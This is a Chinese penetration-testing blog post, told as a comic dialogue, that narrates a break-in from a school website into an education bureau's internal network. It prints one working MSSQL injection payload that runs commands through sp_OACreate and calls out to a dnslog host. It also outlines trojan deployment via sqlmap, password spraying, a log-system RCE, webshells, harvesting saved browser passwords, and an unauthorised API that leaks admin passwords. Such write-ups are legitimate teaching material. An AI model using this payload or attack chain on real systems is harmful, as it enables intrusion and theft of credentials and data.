安服仔日记系列——某教育局内网被打穿

0x00 背景

“A ha ha ha ha ha,鸡汤来咯~”,只见老黑端上一锅鸡汤上来,说:“这这 这菜都齐了,怎么还不吃呀?”。

“老黑呀,这大伙儿都不敢吃”,二狗说到,“有人说,说是在公司有个内鬼!”。

“二狗,你这人就喜欢开玩笑,我去上个厕所。”

“你不能走”,老板喊道。

“老板,你不会相信二狗胡说八道吧!怎么 怎么你也喜欢开玩笑了?”

“要是没有内鬼,你说说你上周末去干嘛了?”

老黑支支吾吾的,“这今天谁,谁要陷害我?二狗,你要陷害我,是吧?”

“老黑呀,教育局的人已经联系我了,你就都说说吧。”老板说到。

“既然大家都知道了,这戏我就不演了。上周末我接了个活,去测试了一下教育局的几个网站,没想到直接把内网给打穿了。本来想吃完饭再告诉你们,没想到实在低调不了啊!”

我说,“老黑NB,这事就该早点说出来让大家高兴高兴。吃完饭,我还得请教你是怎么打的,你可别嫌弃我啊~”

0x01 sql注入上线cs

饭后,老黑说了起来:“我首先是从一个学校的网站找到突破口的,你看看这个数据包, 你能想到什么?”

我:这可能有sql注入,而且asp的网站一般用的是mssql。

黑:没错,更意外的是该数据库拿到的是dba权限,这里就直接考虑上cs。先看看能不能执行系统命令,可以用xp_cmdshellsp_oacreate
payload如下:

appidname=admin’;Declare+%40runshell+INT+Exec+SP_OACreate+’wscript.shell’,%40runshell+out+Exec+SP_OAMeTHOD+%40runshell,’run’,null,’ping+who.ydldax.dnslog.cn’%3b–+

可以发现dnslog有回显,该数据库是可以执行系统命令的。直接用sqlmap的os-shell功能下载马子并执行,可以看到就上线了,还是administrator的用户。

由于该服务器是Windows Server 2012,无法直接获取密码,后通过rdp连接记录获得该服务器密码。

随后用同样的账号和密码去爆破同网段的服务器,直接拿下10台服务器。

“太强了,不亏是老司机,一个字:稳!”,我赞到。

“过奖了!接下来就可以随便翻这10台服务器的文件了,比如拿到里面数据库的权限。”

0x02 教育网内网getshell

老黑说:“但是我们的目标是教育局,现在只是获取学校服务器的权限。”

“我知道了,可以尝试信息收集,看看能不能找到教育局内网的地址,然后通过学校的服务器打进去。”

“没错,而且我确实找到了!”老黑得意地说。

“然后呢?然后该怎么办呢?”我问到。

老黑一言不发,指了指旁边的水杯,我若有所悟,“你是说要心如止水,冷静分析一波?”

老黑:“我TM口渴了,给我倒杯水!”

通过查看内网系统,发现有深信服的日志系统,该系统存在RCE,可以获取System权限。

写入webshell。

翻翻文件,拿到管理员密码。

0x03 各后台大型果奔现场

“管理员密码都有了,那不是想怎么搞就怎么搞了?”我说。

“那可不,我就到处翻了下,你猜怎么着?”老黑一脸坏笑。

难,难道是?

没错,就你想的那样!

我从浏览器中找到保存的密码信息,各种后台直接果奔。

尝试登陆一下这些系统。
图片[1]-安服仔日记系列——某教育局内网被打穿-安全小天地
图片[2]-安服仔日记系列——某教育局内网被打穿-安全小天地

真精彩,管理员都不禁怀疑:如果你能管理系统,那我是谁?

0x04 接口未授权继续拿内网

在这泄露的后台中,有一个是外网的,而且是普通用户权限。这谁能忍?必须干它!

在系统中发现有个人事系统的入口。

点击该选项发现无法访问,后通过内网主机ping该url得到其内网地址,本地host添加解析即可。

老黑接着说道:“我发现里面有个接口未授权,直接改id就可以得到管理员的数据。更神奇的是,居然还把密码返回了。真是给我这个身兼20个QQ群的管理员雪上加霜,小小的年纪就承担了不该拥有的权利和帅气。”
图片[3]-安服仔日记系列——某教育局内网被打穿-安全小天地

最后通过任意文件上传,拿到shell,再上线cs,当场抓获一只服务鸡。

0x05 没有机会

我深深地被老黑的技术折服,问老黑我什么时候才能像你那么厉害?

老黑:有只鸭子天天在河里游来游去,可旁边一群观望的小鸡就只会羡慕。

我:你是说要勇于尝试,在与水斗争后,最终才能征服水?

老黑:没有鸡会(游泳)啊!

文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞6 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容